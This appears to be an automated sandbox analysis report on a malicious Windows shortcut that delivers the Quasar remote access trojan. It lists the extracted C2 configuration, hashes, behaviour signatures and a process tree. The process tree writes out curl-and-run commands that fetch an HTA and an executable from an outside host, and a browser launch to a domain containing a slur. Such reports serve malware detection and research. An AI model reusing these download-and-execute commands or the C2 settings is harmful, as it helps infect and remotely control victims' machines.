Analysis

  • max time kernel
    68s
  • max time network
    73s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-06-2024 21:46

General

  • Target

    cuh.txt.lnk

  • Size

    1KB

  • MD5

    3947296e1f311ad2bd25bb986e9d4622

  • SHA1

    57c1f9b221a150919dc23ce6f10ed5b8f74fbd12

  • SHA256

    6f8196f6de261c3b0d45e9b847ae3cf706d99732778a7f86b954ea23e3dd342b

  • SHA512

    24f5432807bbb1f867765738ddd3c391882a4fd49f19c9d34339f995de3bd07db8ec8ae0df7283e7e670d93c599b89c87ff64f0208a10d52412ab6407715fde1

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

new

C2

roblox.airdns.org:62604

Mutex

QSR_MUTEX_DT5aFgoH5h6bbtKq7Q

Attributes
  • encryption_key

    J5Eb7dBhM8i5671jmkSJ

  • install_name

    Runtime Broker.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Runtime Broker

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\cuh.txt.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5052
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.hta -o "C:\Users\Admin\AppData\Local\Temp\build.hta" && "C:\Users\Admin\AppData\Local\Temp\build.hta"
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4788
      • C:\Windows\system32\curl.exe
        curl -L https://mediafire.zip/build.hta -o "C:\Users\Admin\AppData\Local\Temp\build.hta"
        3⤵
          PID:3468
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\build.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4244
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5080
            • C:\Windows\SysWOW64\curl.exe
              curl -L https://mediafire.zip/build.exe -o build.exe
              5⤵
              • Drops file in System32 directory
              PID:1608
            • C:\Windows\SysWOW64\build.exe
              build.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3092
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3828
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://niggafart.com/
                  7⤵
                  • Enumerates system info in registry
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of WriteProcessMemory
                  PID:752
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc751646f8,0x7ffc75164708,0x7ffc75164718
                    8⤵
                      PID:3604
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
                      8⤵
                        PID:428
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
                        8⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:548
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2960 /prefetch:8
                        8⤵
                          PID:4508
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                          8⤵
                            PID:4468
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                            8⤵
                              PID:3436
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
                              8⤵
                                PID:5080
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:8
                                8⤵
                                  PID:4836
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,11671437008643798134,15755109213579363633,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:8
                                  8⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3104
                  • C:\Windows\System32\CompPkgSrv.exe
                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                    1⤵
                      PID:2144
                    • C:\Windows\System32\CompPkgSrv.exe
                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                      1⤵
                        PID:2432

                      Network

                      MITRE ATT&CK Matrix ATT&CK v13

                      Discovery

                      Query Registry

                      2
                      T1012

                      System Information Discovery

                      3
                      T1082

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                        Filesize

                        152B

                        MD5

                        ecdc2754d7d2ae862272153aa9b9ca6e

                        SHA1

                        c19bed1c6e1c998b9fa93298639ad7961339147d

                        SHA256

                        a13d791473f836edcab0e93451ce7b7182efbbc54261b2b5644d319e047a00a7

                        SHA512

                        cd4fb81317d540f8b15f1495a381bb6f0f129b8923a7c06e4b5cf777d2625c30304aee6cc68aa20479e08d84e5030b43fbe93e479602400334dfdd7297f702f2

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                        Filesize

                        152B

                        MD5

                        2daa93382bba07cbc40af372d30ec576

                        SHA1

                        c5e709dc3e2e4df2ff841fbde3e30170e7428a94

                        SHA256

                        1826d2a57b1938c148bf212a47d947ed1bfb26cfc55868931f843ee438117f30

                        SHA512

                        65635cb59c81548a9ef8fdb0942331e7f3cd0c30ce1d4dba48aed72dbb27b06511a55d2aeaadfadbbb4b7cb4b2e2772bbabba9603b3f7d9c8b9e4a7fbf3d6b6b

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                        Filesize

                        470B

                        MD5

                        82832e4391749121a68719f75b09ff36

                        SHA1

                        0916aeaf172b4da979f2b54d01e70c815954b3f6

                        SHA256

                        4ac032c6433fdcde5fb1304403abe95725573f7618d20099d23fda452700dce0

                        SHA512

                        5effacab94dfb0ce79f2ee2224e708dc78da459a10725deb25f71b76bddde29ad906513a7f680ea42b6bf57f5fcedeed5637bad9a268b3498bc6395b7e979f5e

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                        Filesize

                        6KB

                        MD5

                        8b0a2ad8b4b89c8aba77ecc2586b396a

                        SHA1

                        9196b30f47f4448b595ce5a5914e4262a260e347

                        SHA256

                        b9636b19f75180674997adacd854197b7df37d43d2aeca99a85f5e8379a2eef5

                        SHA512

                        63e1e9e3ee7f9e2f40d370115bcf2b994bcd45276c22507f7640e6a7421c6ee6aac640cfabb24880722fdde39eff438205d13d48a5538ee6e0db8d41ada6cd41

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                        Filesize

                        5KB

                        MD5

                        113f76b563956273e91c0d0779c06fc5

                        SHA1

                        34ceb13eeab34fddaa94d56537c6d6f2eb861c44

                        SHA256

                        a4d8c3e7a654fee44f8657b1416c8c058c42a1cddd4162329ab14126b56a849f

                        SHA512

                        46baf52acc27bb04db02d5304ffe79a014c1d1c6a01477caf9d7b1b7abcb9c11c750298226814825a49c80b728e7ebd8ee1353241503021d2573738f7a36a44b

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                        Filesize

                        16B

                        MD5

                        6752a1d65b201c13b62ea44016eb221f

                        SHA1

                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                        SHA256

                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                        SHA512

                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                        Filesize

                        10KB

                        MD5

                        fdc2123bc2e417071a738d125bcbe80f

                        SHA1

                        06afc3aed571aad6af62a7d6b1d12c125f0139b1

                        SHA256

                        b6799eae350dc2521ccceb9cfc3777d7191238abbee1fa80d4dd7e31a751053a

                        SHA512

                        f4974c6d9a470e2e4827607d2f82fd63110347585801f43352eb5e7bf8da5a10ba55f03c63c7ace38851110bec40604a455cbce93887305123e2ded7379c4426

                      • C:\Users\Admin\AppData\Local\Temp\build.hta
                        Filesize

                        178B

                        MD5

                        6316c03f1136af10c1435fbfd9ed3266

                        SHA1

                        72dd8c35ed8d459dbbf511e036d7e671e403c500

                        SHA256

                        aa2cdaf08dfd772aefdb8989bb52eee87a0784b019278a7101920f46475cb87e

                        SHA512

                        064d114e20697d32a64dc2f9a2825016cb34edcd4e73aeffe45f768e82c966af439a8563ae28a4f37bad8ecfee3c2627ca032eb8a8b637c599af3e7548a5e406

                      • C:\Windows\SysWOW64\build.exe
                        Filesize

                        3.0MB

                        MD5

                        05eecfc1820ab3273409323601a71f23

                        SHA1

                        5076d5c3a1aa6f2ffcc299f803d0dd01b33d6dd7

                        SHA256

                        4a72f3948f014c2ded502832814c6d65feb78bd1caef7df8bcecb78f7a90b6e2

                        SHA512

                        81d10658aaf6d6341b929dcdb1eccd97dd752b7cbe7b497ed85b88a03ea540a2de6b24ae98ace353e861d1ea7ad181449e332dec26b075c4684c7286cc167a00

                      • \??\pipe\LOCAL\crashpad_752_QJPUPFLHLAYIJJFJ
                        MD5

                        d41d8cd98f00b204e9800998ecf8427e

                        SHA1

                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                        SHA256

                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                        SHA512

                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                      • memory/3092-7-0x0000000000400000-0x0000000000704000-memory.dmp
                        Filesize

                        3.0MB

                      • memory/3828-9-0x0000000005EE0000-0x0000000006484000-memory.dmp
                        Filesize

                        5.6MB

                      • memory/3828-15-0x0000000007710000-0x000000000771A000-memory.dmp
                        Filesize

                        40KB

                      • memory/3828-13-0x0000000007180000-0x00000000071BC000-memory.dmp
                        Filesize

                        240KB

                      • memory/3828-12-0x0000000006B40000-0x0000000006B52000-memory.dmp
                        Filesize

                        72KB

                      • memory/3828-11-0x0000000005B30000-0x0000000005B96000-memory.dmp
                        Filesize

                        408KB

                      • memory/3828-10-0x0000000005A90000-0x0000000005B22000-memory.dmp
                        Filesize

                        584KB

                      • memory/3828-8-0x0000000000D90000-0x0000000000DEE000-memory.dmp
                        Filesize

                        376KB